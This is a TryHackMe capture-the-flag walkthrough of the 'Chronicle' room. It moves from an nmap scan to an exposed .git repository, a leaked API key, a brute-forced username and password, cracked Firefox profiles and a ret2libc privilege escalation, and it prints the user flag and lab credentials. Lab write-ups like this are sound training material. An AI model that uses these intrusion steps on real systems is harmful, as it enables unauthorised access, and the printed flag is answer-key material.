Last Updated:
[Chronicle] - TryHackMe - Walkthrough

[Chronicle] - TryHackMe - Walkthrough

[Chronicle] - TryHackMe

As usual, we're going to start off by mapping the services available on the host.

Nmap scan report for
Host is up, received echo-reply ttl 61 (0.17s latency).
Scanned at 2022-05-22 03:22:39 EDT for 24s
Not shown: 997 closed tcp ports (reset)
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b2:4c:49:da:7c:9a:3a:ba:6e:59:46:c2:a9:e6:a2:35 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDELanAivcbXHH+RqBWDQUmT0TJPTzxJ4XOLkZ4hQYAYCUXQ25C24k6ijW6MnKiImF9m9CoMdlzXIAC/DYArGJu+q5L68V1SAaqtS5YljXGb517Qi4ixekjaLua9Z+Du00c0nGWC46WA+JCjI6UP8FlTyNONXJ4Wv8T7ZA6T8rTrWZWd6dSTIKaZaN8fsD31cIJMuX2whX8IczzwzFuxp2ucPLJ0IwpoiX3ubuqUz4kkNi8FI5T2hweqqygLPmdA8AySZrIbmC4AusmmHwSf99aUHXjZ5Z6fHbHAwH0dsGDFaDvHuVFEp4l1h9TpZiKghUllDx9+6eRyKprJMpfvXZ1
|   256 7a:3e:30:70:cf:32:a4:f2:0a:cb:2b:42:08:0c:19:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPxb2LHHqkJNa+RUETb+7kg2rLKG3IxkiOZnG3YP7R5hd2KqQC1eJL1UyHcBKdOYrFllM43rkqfDVSxtm2f/ivc=
|   256 4f:35:e1:33:96:84:5d:e5:b3:75:7d:d8:32:18:e0:a8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPwYIfNblUpR0Hf/77s33mZq1OUXZD4jQacBQBwiLapr
80/tcp   open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
8081/tcp open  http    syn-ack ttl 61 Werkzeug httpd 1.0.1 (Python 3.6.9)
| http-methods: 
|_  Supported Methods: HEAD GET OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

Port 80 appears to show nothing at first.. it just says "old", but through directory brute forcing and further enumeration we find a subdirectory also named /old , which has a file named note.txt and two more sub directories, one named /old/templates and /old/.git

I went ahead and used git-dumper to grab the git repository, for analysis (often can find passwords and other useful hints in git repos, if not in the change log, sometimes in the actual commit comments, it always depends). As well, please note that the /old/templates directory seems to look exactly like the content on port 8081.

wuzz screenshot of the templates subdirectory

Next I execute git log -p on the repository to see what changes have been made and what not, basically just dig through everything and unfortunately we page through several CSS files before we get to some python code (assuming this is django.. if not, it's similar).

Chronicle - TryHackMe - Walkthrough - git log -p

So far, all we've found is some default credentials and what might be an API key. Since there's no login page on port 80, we jump back over to port 8081. Note that sometimes you can just try some default creds to skip having to walk all the way through this stuff.. but I understand if admin:password didn't work the last 100 times, so you assume it won't work this time. Fortunately, people that make mistakes like using admin:password make plenty of other mistakes that are just itching to be exploited.. be sure to copy down '7454c262d0d5a3a0c0b678d6c0dbc7ef' however, that'd be impossible to recall by memory.

Now the login button isn't doing anything. So, eventually I just start trying everything. I click the forgot password button and get a very strange page with just some cartoon image of a woman asking for my username and saying that she'll provide my password.. okay.. so I try admin and I get nothing out of her.. so I load up burp, getting ready to hammer some of these things and otherwise disable some javascript and things and I notice there's a response asking us for an API key (of course) and we're providing NULL..

chronicle - tryhackme - walkthrough - no api key

So, we go ahead and throw our API key in there, but.. we're still having issues, now we don't know the username.. Since we have to provide that freakin' JSON data, I decide to just continue using Burp to brute force it.. but you can brute force the username with any tool that will allow you to send a data string of {"key":"7454c262d0d5a3a0c0b678d6c0dbc7ef"}, which is most of them. I quickly find the username 'tommy' and the server returns his password as promised.

I tried tommy:DevMakesStuff01 with a manually crafted post request, but I still get no play from the login page. So, I moved over to SSH and tried the credentials there, sure enough, we're in and we have our user flag: 7ba840222ecbdb57af4d24eb222808ad

Now we can move onto the easy part. The next user over, 'carlJ' has a hidden mozilla subfolder with some firefox profiles in it. So, I pop over to my toolshed and use sshfs to mount his profiles for cracking.. The profiles end up being protected, again, so we attack them with a brute forcer and they break quickly to 'password1'

We're almost there... we login as carlJ and we find a binary in the mailing folder (smail).. this binary is owned by root, so it's clear what we need to exploit.. some quick analysis shows it's vulnerable to ret2libc, so we bust out pwntools and overflow the binary.

And, you're done!

Task 1  Challenge
Part of Incognito 2.0 CTF

Like my work, Follow on Twitter to be updated and know more about my work! (@0cirius0)

Answer the questions below